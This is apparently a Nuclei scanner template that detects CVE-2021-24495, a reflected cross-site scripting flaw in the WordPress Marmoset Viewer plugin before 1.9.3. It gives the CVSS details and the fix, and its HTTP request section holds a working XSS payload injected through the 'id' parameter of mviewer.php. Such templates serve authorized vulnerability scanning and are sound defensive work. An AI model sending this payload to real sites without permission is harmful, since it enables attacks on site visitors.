id: CVE-2021-24495

info:
  name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting
  author: johnjhacking
  severity: medium
  description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not properly sanitize, validate, or escape the 'id' parameter before outputting back in the page.
  remediation: |
    Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.
  reference:
    - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
    - https://wordpress.org/plugins/marmoset-viewer/#developers
    - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24495
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24495
    cwe-id: CWE-79
    epss-score: 0.00116
    epss-percentile: 0.45113
    cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: marmoset
    product: marmoset_viewer
    framework: wordpress
  tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://"
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          -
          - alert(/{{randstr}}/)
        condition: or

      - type: word
        words:
          - Marmoset Viewer

      - type: status
        status:
          - 200
# digest: 490a004630440220204e0c01e805234c4f5e955c28d85f29d5de12a9a60fbc883256449510f97d50022021831b6d9d8b62e92a26393244c2a1da0a23e099ea9ee8008a3fa1cf63f283b5:922c64590222798bb761d5b6d8e72950